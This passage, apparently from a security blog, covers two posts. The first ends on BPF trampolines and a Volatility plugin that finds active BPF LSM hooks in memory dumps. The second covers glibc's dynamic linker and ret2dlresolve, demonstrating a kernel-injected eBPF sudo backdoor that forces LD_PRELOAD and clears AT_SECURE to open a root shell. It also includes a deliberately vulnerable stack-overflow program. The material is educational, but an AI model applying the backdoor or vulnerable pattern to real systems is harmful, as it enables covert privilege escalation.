Schedule removal through another task, e.g., cron or systemd.
Use the prctl syscall to set the exe file.
Scripts that are run by an interpreter are unaffected.
Using io_uring’s asynchronous unlink requests in combination with a dedicated kernel thread for processing them might (not tested) also be an option.

BPF Trampolines: The glue between C and BPF

Now that we got ourselves a small BPF-based security module to play with, we can examine how it works under the hood.

Reaching the tramp

Let’s start by looking at the part of the infrastructure that is statically compiled into the kernel. Figure 1 gives an overview of the code path leading up to our BPF program.

At selected places, the kernel calls functions starting with security_. For example, the vfs_unlink function calls security_inode_unlink and aborts if it returns a nonzero value. LSM hooks are meant to provide a higher level of abstraction than system calls; thus it makes sense to pace the gatekeeper call at a choke point in the virtual file system (VFS) which may operations must pass, independently of their entry point into the kernel and the type of object they are operating on.

Each of those call sites has its own member in the global security_hook_heads structure. The security_inode_unlink function uses its member to traverse a list of all registered callbacks, calling them one by one. As soon as one of them returns a nonzero value it aborts and propagates the value back to the caller.

There are numerous ways how we can find out where the indirect calls lead us. For example, we can use trace-cmd with the function graph tracer to record a trace of the functions called during an unlink system call.

$ touch /tmp/hax && sudo trace-cmd record -p function_graph \
--max-graph-depth 4 -g do_unlinkat -n "*interrupt*" -n "*irq*" \
-n "capable" -n "*__rcu*" -n "*_spin_*" -v -e "*irq*" -e "*sched*" \
-F /bin/rm /tmp/hax \
&& trace-cmd report trace.dat && sudo trace-cmd reset
...
rm-8004  [011] 17857.021621: funcgraph_entry:                   |      security_inode_unlink() {
rm-8004  [011] 17857.021621: funcgraph_entry:        0.129 us   |        bpf_lsm_inode_unlink();
rm-8004  [011] 17857.021622: funcgraph_exit:         0.436 us   |      }
...

Alternatively, we can debug the kernel on a guest VM and set a breakpoint, e.g., on the function we suspect to be called. Looking at the backtrace confirms the observation:

...
(remote) gef➤  b bpf_lsm_inode_mkdir
Breakpoint 2 at 0xffffffff81230d80: file ./include/linux/lsm_hook_defs.h, line 126.
(remote) gef➤  c
...
(remote) gef➤  bt
#0  bpf_lsm_inode_mkdir (dir=0xffff8880053f63a0, dentry=0xffff888005799480, mode=0x1ed) at ./include/linux/lsm_hook_defs.h:126
#1  0xffffffff814c56d0 in security_inode_mkdir (dir=0xffff8880053f63a0, dentry=0xffff888005799480, mode=0x1ed) at security/security.c:1298
#2  0xffffffff8130488e in vfs_mkdir (mnt_userns=0xffffffff82e4e920 <init_user_ns>, dir=0xffff8880053f63a0, dentry=0xffff888005799480, mode=0x1ed) at fs/namei.c:4029
#3  0xffffffff81304a02 in do_mkdirat (dfd=0xffffff9c, name=0xffff8880075b1000, mode=0x1ed) at fs/namei.c:4061
#4  0xffffffff81304b7d in __do_sys_mkdir (pathname=<optimized out>, mode=<optimized out>) at fs/namei.c:4081
...

However, as we can see, the function usually does absolutely nothing.

(remote) gef➤  x/5i $rip
=> 0xffffffff81230d80 <bpf_lsm_inode_mkdir>:    endbr64
   0xffffffff81230d84 <bpf_lsm_inode_mkdir+4>:  nop    DWORD PTR [rax+rax*1+0x0]
   0xffffffff81230d89 <bpf_lsm_inode_mkdir+9>:  xor    eax,eax
   0xffffffff81230d8b <bpf_lsm_inode_mkdir+11>: ret

It exists for the sole purpose of being ftrace attachable! You might have spotted the nop instruction at the very beginning: this one is just reserving some space which allows the ftrace framework to divert control flow by dynamically patching the kernel text.

We can see the patching machinery at work by placing a read-write watchpoint on the nop’s address before attaching our program. It is hit multiple times during the attachment process, and when everything is done, the nop is replaced by a call to a BPF trampoline.

The Tramp

BPF trampolines are the architecture-dependent glue that connects native kernel functions to BPF programs. Currently only arm64 and x86 support the generation of BPF trampolines. Figures 2 and 3 show the stack frame and code of the generated trampoline, respectively.

Some values are burned into the trampoline upon generation; this includes pointers to its metadata-holding struct bpf_tramp_image as well as the struct bpf_prog of each program it leads up to. Local variables are stored in the trampolines stack frame, most importantly the read-only context ctx received by the BPF programs lives on this stack.

The execution of the trampoline begins by grabbing a percpu reference to itself. Probably to indicate to other code which CPUs are currently using the trampoline. (Question: Is it really a percpu ref? Would be strange to get it while migration is enabled.)

Now comes the part where the trampoline calls into the jit-compiled BPF programs one by one, handing each program a pointer to the stack-allocated context holding the directory and the directory entry of the file to be deleted as well as the return value of the previous BPF program. While a BPF program is running it enters a read-copy-update (RCU) read-side critical section and disables migration to other CPUs. Optionally, it might also measure the execution time of the BPF program.

As soon as a program returns a nonzero value, the trampoline stops invoking other programs and directly goes to its exit routine. Otherwise, it calls the original function, i.e., bpf_lsm_inode_unlink, for its side effects and return value once all BPF programs are finished.

Upon exit, the trampoline drops the ref to itself and returns directly into the security_inode_unlink function through an extra lowering of its stack pointer, propagating either the return value of the last BPF program or that of the attached function.

Aside: You probably already guessed that the utility of ftrace and BPF trampolines are not limited to realizing KRSI.

In fact, we already saw another use of the ftrace framework: it’s the machinery that drives trace-cmd. If you’d strace it, you would see that it’s doing most of its magic by reading and writing files in tracefs, the user space interface of ftrace. Furthermore, ftrace can also be used by kernel modules to install callbacks into their code.

BPF trampolines on the other hand are used to jump into all kinds of BPF programs, not only LSM-related ones. Numerous flags are controlling their generation, and the outcome we described above is just one combination of those. For instance, you could also generate trampolines that cannot skip the original function and simply return to it, or trampolines that call BPF programs after the original function was executed by the trampoline.

Digging Through Memory Dumps

Now that we are equipped with some background knowledge, we can get back to the original question: Given a memory dump of a system can we reconstruct which BPF LSM hooks were active?

For this part, we’re going to use Volatility3 as a memory forensics framework and implement our feature as a plugin. You can find the source code here. However, the techniques are not tied to a specific framework in any way.

First, we have to find out which hooks are active. For that purpose we can simply disassemble all the bpf_lsm_ stub functions and check if their ftrace nops are replaced by a call. This gives us the active hooks and the corresponding addresses of the executable trampoline images.

Next, we can figure out which programs belong to a given image. There are at least two approaches that immediately come to mind: disassemble the trampolines and extract the compiled-in addresses of the program code and their corresponding metadata structs, or query higher-level abstractions like BPF link objects.

While the first approach is less susceptible to anti-forensics it suffers from dependence on trampoline code generation. Since we already know which hooks are active it’s safe to look for the program information at places that are easier to manipulate, like the link_idr which contains all BPF link objects in use. If we don’t find a corresponding program there it’s considered suspicious, and we will raise an alert.

Figure 4 gives an overview of how BPF link objects can be used to match trampoline images to links. Iterating the link_idr gives us bpf_link objects. The link type maps directly the type of the container structure. Thus, if it indicates a tracing link we can pivot to the outer struct and use its trampoline member to get the address of the executable trampoline image that the link’s program is attached to.

Putting it all together, we can find all active BPF LSM hooks as well as all programs attached to them. You can find the full Volatility plugin code that implements the above approach in our BPF plugin suite on GitHub. Running it against a memory image of a system that uses our toy LSM correctly reports activity on two hooks.

./vol.py -f /io/dumps/mini_lsm_w_dummy.elf -v linux.bpf_lsm
...
LSM HOOK	Nr. PROGS	IDs

bpf_lsm_bprm_creds_for_exec	2	16,18

bpf_lsm_inode_unlink	1	19

Note that we have added a second program to bprm_creds_for_exec in order to cover the case where more than one program is attached to a single hook. You can now use the program IDs with other plugins like bpf_listprogs to continue your investigation. The memory image can be downloaded here and the symbols are provided here.

Wrapup

In this post, we learned about LSMs, a cornerstone of building high-security Linux systems, and their programmability through modern BPF. On the way we met two core parts of Linux’s tracing infrastructure: ftrace and BPF trampolines. In the end, we leveraged this knowledge to build a memory forensics tool capable of detecting a subtle way in which malware might infect a system.

References

[1] “Building a Security Tracing Utility To Snoop Into the Linux Kernel.” https://lumontec.com/1-building-a-security-tracing

[2] “ChromeOS: Noexec File System Bypass Using Memfd.” https://bugs.chromium.org/p/chromium/issues/detail?id=916146

[3] “Commit: bpf: Introduce BPF Trampoline.” [Online]. Available: https://github.com/torvalds/linux/commit/fec56f5890d93fc2ed74166c397dc186b1c25951

[4] “eBPF: Block Linux Fileless Payload ‘Malware’ Execution With BPF LSM.” https://djalal.opendz.org/post/ebpf-block-linux-fileless-payload-execution-with-bpf-lsm/

[5] “Elixir: arch/x86 arch_prepare_bpf_trampoline.” [Online]. Available: https://elixir.bootlin.com/linux/latest/source/arch/x86/net/bpf_jit_comp.c#L2128

[6] “FOSDEM 2020: Kernel Runtime Security Instrumentation LSM+BPF=KRSI,” Jan. 02, 2020. [Online]. Available: https://archive.fosdem.org/2020/schedule/event/security_kernel_runtime_security_instrumentation/

[7] “Google Help: retpoline.” [Online]. Available: https://support.google.com/faqs/answer/7625886?hl=en

[8] “KPsingh‘s Kernel Tree.” [Online]. Available: https://github.com/sinkap/linux-krsi/blob/patch/v1/examples/samples/bpf/lsm_detect_exec_unlink.c

[9] “KRSI PATCHv1.” [Online]. Available: https://lwn.net/ml/linux-kernel/20191220154208.15895-1-kpsingh@chromium.org/

[10] “KRSI PATCHv9 (final).” [Online]. Available: https://patchwork.kernel.org/project/linux-security-module/cover/20200329004356.27286-1-kpsingh@chromium.org/

[11] “KRSI RFCv1,” Oct. 09, 2019. [Online]. Available: https://lore.kernel.org/bpf/20190910115527.5235-1-kpsingh@chromium.org/#r

[12] “Linux Security Modules: General Security Support for the Linux Kernel”.

[13] “Linux Security Summit NA 2019: Kernel Runtime Security Instrumentation - KP Singh, Google,” Oct. 02, 2019. [Online]. Available: https://www.youtube.com/watch?v=2CZSSRfgAgQ

[14] “Linux Security Summit NA 2020: KRSI (BPF + LSM) - Updates and Progress - KP Singh, Google,” Jul. 01, 2020. [Online]. Available: https://lssna2020.sched.com/event/c74F/krsi-bpf-lsm-updates-and-progress-kp-singh-google

[15] “LPC 2020: BPF LSM (Updates + Progress),” Aug. 25, 2020. [Online]. Available: https://lpc.events/event/7/contributions/680/

[16] “LWN: bpf: add ambient BPF runtime context stored in current.” https://lwn.net/Articles/862539/

[17] “LWN: Enabling Non-Executable Memfds.” https://lwn.net/Articles/918106/

[18] “LWN: Impedance Matching for BPF and LSM,” Feb. 26, 2020. https://lwn.net/Articles/813261/

[19] “LWN: Kernel Runtime Security Instrumentation.” https://lwn.net/Articles/798157/

[20] “LWN: KRSI — The Other BPF Security Module,” Dec. 27, 2019. https://lwn.net/Articles/808048/

[21] “LWN: KRSI and Proprietary BPF Programs,” Jan. 17, 2020. https://lwn.net/Articles/809841/

[22] “Mitigating Attacks on a Supercomputer With KRSI.”

[23] “[PATCH bpf-next 0/4] Reduce overhead of LSMs with static calls.” [Online]. Available: https://lore.kernel.org/bpf/202301201137.93A66D1C76@keescook/T/#ma6a93c345ad38764bef97c18c982c11ab1cf0c0f

[24] “[PATCH v4 bpf-next 00/20] Introduce BPF trampoline.” [Online]. Available: https://lore.kernel.org/bpf/20191114185720.1641606-1-ast@kernel.org/#t

[25] “[RFC] security: replace indirect calls with static calls.” [Online]. Available: https://lore.kernel.org/bpf/20200820164753.3256899-1-jackmanb@chromium.org/

[26] “Static Calls in Linux 5.10.” https://blog.yossarian.net/2020/12/16/Static-calls-in-Linux-5-10

[27] “The Design and Implementation of Userland Exec”, [Online]. Available: https://grugq.github.io/docs/ul_exec.txt

[28] “Volatility3.” [Online]. Available: https://github.com/volatilityfoundation/volatility3

ret2dlresolve: Exploiting with the Dynamic Linker

2023-03-29T00:00:00+00:00

In this post I’m going to use the ret2dlresolve and DynELF features of pwntools as an excuse to learn a bit about Linux’s dynamic linker (DL). This piece of low-level software is ubiquitous: it is present in virtually every process’ address space, its code is the first thing that runs whenever a new program is executed, and it is central to the implementation of shared libraries and user address space layout randomization (ASLR) in Linux. Its ubiquity and position at the core of user space make the DL an interesting subject for exploit developers and malware authors alike.

But is there even something like the DL on a Linux system? Well, this question is essentially equivalent to asking if there is the libc implementation under Linux. There is not. There’s GNU libc, which is used in almost all of the well-known desktop and server distributions. There’s musl libc, which is used in some lightweight, embedded or hardened distributions. There’s Android’s bionic. And there’s so much more. We’re going to study GNU’s glibc (after reading its source code any other implementation feels like kindergarten) for an amd64 processor. So keep in mind that what you read here might not help you with pwning your router or writing malware for your phone.

A typical assignment of the DL consists of three stages: preparing program startup, providing a runtime environment, and cleaning up at program shutdown. In this post we will mainly be concerned with its role at runtime, however, let’s start with a quick look at program startup.

Program Startup

Loading

By its very nature, the dynamic linker lives right on the boundary of user space, which is why we will start our journey in ring 0, the kernel. If you choose a random program on your system, the probability that it has an INTERP segment is close to one. The corresponding program header points us to a string embedded in the binary. readelf is so kind to include it in the segment overview

$ readelf --segments /bin/chromium

Elf file type is DYN (Position-Independent Executable file)
Entry point 0x13e0
There are 13 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                 0x00000000000002d8 0x00000000000002d8  R      0x8
  INTERP         0x0000000000000318 0x0000000000000318 0x0000000000000318
                 0x000000000000001c 0x000000000000001c  R      0x1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
(snip)

indicating that we will find the string /lib64/ld-linux-x86-64.so.2 at offset 0x318 in the binary. (Note: The terms “dynamic linker” and “interpreter” will be used interchangeably.)

To understand the purpose of this segment we’ll have a look at program loading in the kernel. If a process wants to change the program it executes, it can do so via the execve system call, passing the filesystem location of the new program as the first argument. Eventually, the kernel passes this file to the (absolutely gigantic) load_elf_binary function, which is shown in the code listings below. As we can see, the function first checks if the process tried to execute an ELF file (as compared to, e.g., a script starting with #! or an ancient aout binary) by inspecting the file magic [1], and then looks for an INTERP segment [2]. If it is found, the interpreter is recorded in a variable of the same name [3]. (Note: The struct linux_binprm *bprm is the central data structure that is used to record and pass around all kind of information regarding the loading of a program.)

static int load_elf_binary(struct linux_binprm *bprm)
{
(snip)
        struct elf_phdr *elf_ppnt, *elf_phdata, *interp_elf_phdata = NULL;
(snip)
        struct elfhdr *elf_ex = (struct elfhdr *)bprm->buf;
(snip)
	/* First of all, some simple consistency checks */
	if (memcmp(elf_ex->e_ident, ELFMAG, SELFMAG) != 0) // [1]
		goto out;
(snip)
	elf_ppnt = elf_phdata;
	for (i = 0; i < elf_ex->e_phnum; i++, elf_ppnt++) {
		char *elf_interpreter;
(snip)
		if (elf_ppnt->p_type != PT_INTERP) // [2]
			continue;
(snip)
                 retval = elf_read(bprm->file, elf_interpreter, elf_ppnt->p_filesz,
				  elf_ppnt->p_offset);
(snip)
                 interpreter = open_exec(elf_interpreter); // [3]
(snip)

Before we can map the new executable file into the process’ virtual address space we have to account for one more thing: the execution of another program might change the security domains of the process executing it. A classic example is the execution of a setuid or setgid program, but Linux Security Modules (LSMs) like selinux or TOMOYO may as well enforce their own set of security domains at this point.

(Aside: The LSM subsystem was introduced to facilitate the implementation of a wide range of security models via a Loadable Kernel Module (LKM). Originally, the feature was devised in response to the NSA’s demand for a way to enforce Mandatory Access Control (MAC) on their systems. The kernel calls into the active LSMs at a number of carefully chosen, pre-defined places and LSMs can use the security member, which you will find in many structures, to persist state information within an object.)

(Aside: A filesystem stores not only the file contents, but also some file metadata. On Linux that typically includes the file’s user, group and mode. If the mode of an executable file has the S_ISUID bit set (and the filesystem is not mounted with the nosuid option), the kernel will change the effective user and group of any process executing the program to the ones of the file.)

In any case, accounting for this change has to happen, and does happen in the call to begin_new_exec, before putting anything that belongs to the new program into the current process (see, e.g, this Serenity OS exploit for an example of the kind of race conditions that can arise otherwise).

When mapping the program image into memory, note how the base is only randomized if the program requests an interpreter [1]. (Aside: A process may use the personality system call to, among other things, disable ASLR for itself. For example, this is what gdb does for its inferior (debugee). This is why the additional checks [2] exits.)

if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space) // [2]
		current->flags |= PF_RANDOMIZE;
(snip)
/* Now we do a little grungy work by mmapping the ELF image into
   the correct location in memory. */
for(i = 0, elf_ppnt = elf_phdata;
	i < elf_ex->e_phnum; i++, elf_ppnt++) {
(snip)
	if (elf_ppnt->p_type != PT_LOAD)
		continue;
(snip)
        vaddr = elf_ppnt->p_vaddr;
(snip)
	if (interpreter) { // [1]
		load_bias = ELF_ET_DYN_BASE;
		if (current->flags & PF_RANDOMIZE) // [2]
			load_bias += arch_mmap_rnd();
(snip)
	error = elf_map(bprm->file, load_bias + vaddr, elf_ppnt,
			elf_prot, elf_flags, total_size);
(snip)
}

e_entry = elf_ex->e_entry + load_bias;

Next, we load the interpreter into the virtual memory and set the address of the first user space instruction to the entry point of the interpreter.

if (interpreter) {
	elf_entry = load_elf_interp(interp_elf_ex,
					interpreter,
					load_bias, interp_elf_phdata,
					&arch_state);
(snip)
        elf_entry += interp_elf_ex->e_entry;

At this point you might ask yourself: “How is the interpreter actually supposed to find the program it has to interpret?”. Since their base addresses are randomized separately this seems like an unsolvable problem. At least I puzzled about this question for a while.

However, the answer lies in the call to create_elf_tables. As we can see, this function places some useful information, including the interpreter’s base address [1] and the program’s entry point [2], in the so-called auxiliary-vector on the stack, of the new program just below the envp array.

/* Create the ELF interpreter info */
elf_info = (elf_addr_t *)mm->saved_auxv;
/* update AT_VECTOR_SIZE_BASE if the number of NEW_AUX_ENT() changes */
#define NEW_AUX_ENT(id, val) \
	do { \
		*elf_info++ = id; \
		*elf_info++ = val; \
	} while (0)
(snip)
	NEW_AUX_ENT(AT_BASE, interp_load_addr); // [1]
(snip)
	NEW_AUX_ENT(AT_ENTRY, e_entry); // [2]
(snip)
         /* Put the elf_info on the stack in the right place.  */
	if (copy_to_user(sp, mm->saved_auxv, ei_index * sizeof(elf_addr_t)))

Finally, we prepare our return to the all-new user space by overwriting the user context that we saved when the process trapped into the kernel.

mm->start_stack = bprm->p;
(snip)
regs = current_pt_regs();
(snip)
START_THREAD(elf_ex, regs, elf_entry, bprm->p);

This final macro zeros out all the saved registers, except for the stack pointer and program counter, which are set to the new stack at bprm->p and the interpreter’s entry point at elf_entry, respectively.

Interpretation

The dynamic linker’s entry point makes two calls, and then jumps to the program’s _entry symbol, i.e., its entry point.

0x7ffff7fcd050 <_start>:	                mov    rdi,rsp
0x7ffff7fcd053 <_start+3>:	        call   0x7ffff7fcdd70 <_dl_start>
0x7ffff7fcd058 <_dl_start_user>:	        mov    r12,rax
(snip)
0x7ffff7fcd085 <_dl_start_user+45>:	call   0x7ffff7fdc120 <_dl_init>
(snip)
0x7ffff7fcd094 <_dl_start_user+60>:	jmp    r12

During the first call, the linker relocates itself to wherever it was dropped in memory by the kernel. (Aside: Due to ASLR or shared library dependencies a program might have symbolic references whose actual value is not known until runtime. Loosely speaking, relocation refers to the process of filling in those values).

Afterwards, some more “sane” C code parses the auxiliary vector on and calls dl_main, which interprets the program (and is gigantonormous as well). (Aside: You can execute the DL directly and specify a program as the first argument, e.g., $ ld.so /bin/ls. In that case, the linker loads the program into memory and adjusts everything (argv, auxv, …) to make it “look like” the program was executed directly, before starting to interpret it.) Here we first encounter the central data structure of the DL the list of struct link_map objects. Each entry describes an object in the process’ virtual address space. Among other things, it contains the base address as well as pointers into the object’s dynamic segment, which is the interface that tells the DL how the library or program would like to be interpreted.

Some of the high-level steps in the interpretation process are:

Setup of the library search path for subsequent loads
Setting up the debugger interface (here and here)
Handling the pre-loading of libraries via the ld.so.preload file or LD_PRELOAD environment variable and load order in general
Loading the libraries requested by the program and all of their dependencies
Relocating all objects

We are going to take a look at the second and fifth step as they will be important later. If the program’s dynamic segment has a DT_DEBUG entry, the DL will fill it with the address of the r_debug structure [1].

/* Set up debugging before the debugger is notified for the first time.  */
elf_setup_debug_entry (main_map, r);
(snip)
static inline void
__attribute ((always_inline))
elf_setup_debug_entry (struct link_map *l, struct r_debug *r)
{
  if (l->l_info[DT_DEBUG] != NULL)
    l->l_info[DT_DEBUG]->d_un.d_ptr = (ElfW(Addr)) r; // [1]
}

A debugger like gdb will search for this entry and use the structure to find the list of link maps as well as an address that is used to facilitate breakpoints on shared library loads. gcc adds this entry by default and stripping a binary does not remove it, however, its not mandatory and nothing stops you from removing it (patchelf --add-debug-tag adds it again, see also patchelf on GitHub).

If the DL_BIND_NOW environment variable is not set and the program’s DT_FLAGS entry does not include the BIND_NOW flag, the DL skips the relocation of functions that are called via the procedure linkage table (PLT) at startup (lazy linking). In order to be able to perform them later, the DL places two pointers in the second and third global offset table (GOT) entry: got[1] points to the link map of the object (object dependent) and got[2] points to a DL internal function that performs the relocation at runtime (object independent).

Program Runtime

Layz Linking

When a PLT stub is called for the first time, the corresponding GOT entry points to the push right after the initial jump instruction. Examining some more stubs, we can observe that each pushes a distinct integer on the stack before they all jump to same address at the very beginning of the PLT.

(gdb) x/2i 0x401030
0x401030 <read@plt+0>     jmp    QWORD PTR [rip+0x2fca]    # got[3] == 0x401036
0x401036 <read@plt+6>     push   0x0
0x40103b <read@plt+11>    jmp    0x401020

There, the object’s struct link_map * (previously placed in got[1]) is pushed and the execution jumps to the _dl_runtime_resolve trampoline (previously placed in got[2]).

(gdb) x/2i 0x401020
0x401020:	push   QWORD PTR [rip+0x2fca]    # got[1]
0x401026:	jmp    QWORD PTR [rip+0x2fcc]    # got[2]

The trampoline calls _dl_fixup [1] (with the arguments that were pushed to the stack) and afterwards jumps to the implementation of the function whose PLT entry was called [2]. (Note: I am omitting some code that saves and restores the processor state in order to make the call transparent to the program.)

(gdb) x/100i $rip
   0x7ffff7fe2a90 <_dl_runtime_resolve_xsavec>:	        push   rbx
   0x7ffff7fe2a91 <_dl_runtime_resolve_xsavec+1>:	         mov    rbx,rsp
(snip)
   0x7ffff7fe2afd <_dl_runtime_resolve_xsavec+109>:	mov    rsi,QWORD PTR [rbx+0x10]
   0x7ffff7fe2b01 <_dl_runtime_resolve_xsavec+113>:	mov    rdi,QWORD PTR [rbx+0x8]
   0x7ffff7fe2b05 <_dl_runtime_resolve_xsavec+117>:	call   0x7ffff7fdb620 <_dl_fixup>    // [1]
   0x7ffff7fe2b0a <_dl_runtime_resolve_xsavec+122>:	mov    r11,rax
(snip)
   0x7ffff7fe2b46 <_dl_runtime_resolve_xsavec+182>:	bnd jmp r11    // [2]

_dl_fixup has to perform two tasks: finding and returning the address of the function that was called (symbol resolution) as well as writing it to the correct GOT entry (relocation). During startup the dynamic linker placed pointers to the binary’s dynamic segment in the link map’s l_info member. They are now used to find the relocation, symbol, version and string tables that are needed to fix up the GOT entry.

_dl_fixup (struct link_map *l, ElfW(Word) reloc_arg)
{
  const ElfW(Sym) *const symtab
    = (const void *) D_PTR (l, l_info[DT_SYMTAB]); // [1]
  const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]); // [2]

  const uintptr_t pltgot = (uintptr_t) D_PTR (l, l_info[DT_PLTGOT]); // [3]

Here the DL is extracting pointers to the symbol [1] and string table [2] as well as the GOT [3] from the objects’s dynamic segment.

const PLTREL *const reloc
    = (const void *) (D_PTR (l, l_info[DT_JMPREL])
		      + reloc_offset (pltgot, reloc_arg)); // [1]
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)]; // [2]
const ElfW(Sym) *refsym = sym;
void *const rel_addr = (void *)(l->l_addr + reloc->r_offset); // [3]

In the next few lines, the DL uses the integer provided by the PLT stub, the value of the reloc_arg variable, as an index into the relocation table [1] to find the relocation entry that corresponds to the PLT stub. Two types of information are extracted from the relocation: the index of the corresponding symbol in the symbol table [2] and the location where the resolved address should be written [3].

By now the DL has gathered almost all the information that is needed to find the symbol’s runtime value, however, glibc also implements symbol versioning.

const ElfW(Half) *vernum =
    (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff; // [1]
version = &l->l_versions[ndx]; // [2]

The symbol’s version is a half integer stored in another table at the same index as the symbol table entry [1], which can is used to find the actual version information in yet another table [2]. (Aside: In addition to the symbol name, readelf -s also shows the version requested by a binary, e.g., getenv@GLIBC_2.2.5. The tables accessed at [1] and [2] can be inspected using readelf -V.)

After gathering the name and version of the referenced symbol, the dynamic linker searches the loaded shared objects for a definition using _dl_lookup_symbol_x. It should be mentioned that the DL groups loaded objects into namespaces (called scopes in the code), where the depending object’s link map specifies in which namespaces a definition should be searched. The linker picks the first definition it can find, i.e., the order of namespaces and objects within them matters.

result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
	    version, ELF_RTYPE_CLASS_PLT, flags, NULL);

On success, it returns a pointer to the defining object’s link map and (over)writes the symbol entry on _dl_fixup’s stack with the actual definition. Performing the relocation and returning the function’s address is now a twoliner.

// value = result->l_addr + sym->value
value = DL_FIXUP_MAKE_VALUE (result, SYMBOL_ADDRESS (result, sym, false));
(snip)
// return *reloc_addr = value; I <3 glibc.
return elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);

Loading Shared Objects

The library functions of the dl* family, e.g., dlopen, are exported by libdl, not libc. They are wrappers around internal dynamic linker functions. For example, dlopen essentially exposes _dl_open, which is also used by the dynamic linker at program startup. The real work is done inside dl_open_worker, which accepts a single pointer to a struct dl_open_args describing the library to be opened. In close analogy to program startup, the procedure involves mapping and relocating the object as well as all of its dependencies, executing constructors and finally adding it to the appropriate scopes to make their symbols available to other parts of the code.

Exploitation

Startup - LPEs, Malware & Rootkits

A process can elevate its privileges by executing a setuid or setgid binary. As we saw earlier, the kernel places argv and argc, which are entirely supplied by the parent program, on the stack of the new, more privileged, program. Thus, the new (forked) program must treat all of them as untrusted input if it does not want to end up in the long list of setuid binaries that caused security issues, see, e.g., PwnKit or sudoedit for recent examples of vulnerabilities that arose from improper handling of those inputs. However, the program can be ever so careful, if the DL happily interprets environment variables like LD_PRELOAD, LD_AUDIT or LD_LIBRARY_SEARCH_PATH the party is over long before it gets to execute its first instruction. It looks like more than 10 years ago glibc developers had some issues with that, e.g., CVE-2010-3847 or CVE-2010-3856, but since then it’s been silent.

At this point I asked myself: How does the DL actually know if it has to operate in secure mode, i.e., prevent the previous program from meddling with the execution of the new program? One option would be to use of a combination of syscalls like get[e](uid|gid), however, this would miss occasions where LSMs want to enforce their own security boundaries. Another option could be to implement a dedicated syscall that provides this information to the DL on-demand, since, as we have seen earlier, the kernel already has to account for it.

Well, close but not quite: the kernel communicates this information up to user space via the AT_SECURE entry in the auxiliary vector. LSMs can set the bprm->secureexec entry if they are of the opinion that user space code should be informed that it runs after a privilege-gaining exec. We can check the (apparmor|cap|smack|selinux|...)_bprm_creds_for_exec functions to see how the different modules determine whether to set the flag or not. Finally, the DL parses auxv to determine if it has to operate in secure mode:

__libc_enable_secure = auxv_values[AT_SECURE];

As this is, after all, a post on an offensive security blog, not a LWN article, let’s do something offensive with our newfound knowledge: You probably also hate having to type your password each time you use sudo, but on the other hand you also shy away from root-only or sudo’s password less mode for the obvious reasons. So … wouldn’t it be nice to have some sneaky way to get root whenever you want without completely jeopardizing your system’s security on first sight? Well, here it is:

$ sudo --backdoor
# id
uid=0(root) gid=0(root) groups=0(root),1000(user)

where you can of course use any suid binary, restrict usage to certain users, or change the magic flag(s) to make it less obvious in the shell history. So how does it work? If we instruct the dynamic linker to print the auxiliary vector we can observe that it seems like the kernel forgot to set the AT_SECURE entry.

$ LD_SHOW_AUXV=1 sudo --backdoor
(snip)
AT_SECURE:            0
(snip)
#

It also looks like sudo requests some funny library named libpwn.so, whose constructor drops us the root shell.

$ LD_DEBUG=files sudo --backdoor
(snip)
       807:     file=./libpwn.so [0];  needed by sudo [0]
       807:     file=./libpwn.so [0];  generating link map
(snip)
       807:     calling init: ./libpwn.so
#

To investigate this can also launch the program under a debugger with the magic flag set.

$ gdb --args sudo --backdoor
(snip)
(gdb) starti
Starting program: /usr/bin/sudo --backdoor

Program stopped.
0x00007fee03d9c9c0 in _start () from /lib64/ld-linux-x86-64.so.2
(gdb) x/8gx $rsp
0x7fff3e09a330: 0x0000000000000001      0x00007fff3e09be64
0x7fff3e09a340: 0x0000000000000000      0x00007fff3e09a538
0x7fff3e09a350: 0x00007fff3e09be7d      0x00007fff3e09be8d
0x7fff3e09a360: 0x00007fff3e09be9c      0x00007fff3e09bea9

Strange, it looks like the --backdoor flag disappeared (argc=1 and there is only one pointer in the argv array). Also notice that the pointer to the first environment variable is smaller than all the other pointers. Examining it reveals what you probably already guessed.

(gdb) x/s 0x7fff3e09a538
0x7fff3e09a538: "LD_PRELOAD=./libpwn.so"

How could this happen? The short answer is that we injected some code into the kernel: It waits for our custom backdoor trigger, e.g., user x executes suid binary y with flags z, and mangles with the program’s stack right before the exec system call returns to user space. The mangling is injecting a fake LD_PRELOAD environment variable and overwrites the AT_SECURE entry. (Aside: If you are interested in the details you can find the source code here and start here for an introduction to eBPF.)

In general, the DL’s pre-loading mechanism and library search order has a long history of being abused by user space malware, see, e.g., Symbiote for a recent real-world example and Jynx2 or azazel for classic open source rootkit implementations. Note that LD_PRELOAD-based rootkits usually inject into any process while the technique described above may allow for a more fine-grained approach.

Runtime - ret2dlresolve, ret2dl_open_worker & DynELF

Throughout this section, we will use the following vulnerable program to illustrate the exploitation techniques discussed below. Sample code that implements the presented ideas can be found here, but you are encouraged to hack it yourself while reading.

// gcc -fno-stack-protector -no-pie -o poc poc.c

#include <unistd.h>

void main(void) {
  char b;
  read(0, &b, 0x1337);
}

With corresponding assembly.

0000000000401126 <main>:
  401126:	55                   	push   rbp
  401127:	48 89 e5             	mov    rbp,rsp
  40112a:	48 83 ec 10          	sub    rsp,0x10
  40112e:	48 8d 45 ff          	lea    rax,[rbp-0x1]
  401132:	ba 37 13 00 00       	mov    edx,0x1337
  401137:	48 89 c6             	mov    rsi,rax
  40113a:	bf 00 00 00 00       	mov    edi,0x0
  40113f:	e8 ec fe ff ff       	call   401030 <read@plt>
  401144:	90                   	nop
  401145:	c9                   	leave
  401146:	c3                   	ret

Note that we disable position independent code and stack protectors to simplify exploitation.

ret2dlresolve

Suppose that we have

an arbitrary write primitive to a known address,
the program binary and its base address in memory,
rip control,
and control of the data under rsp.

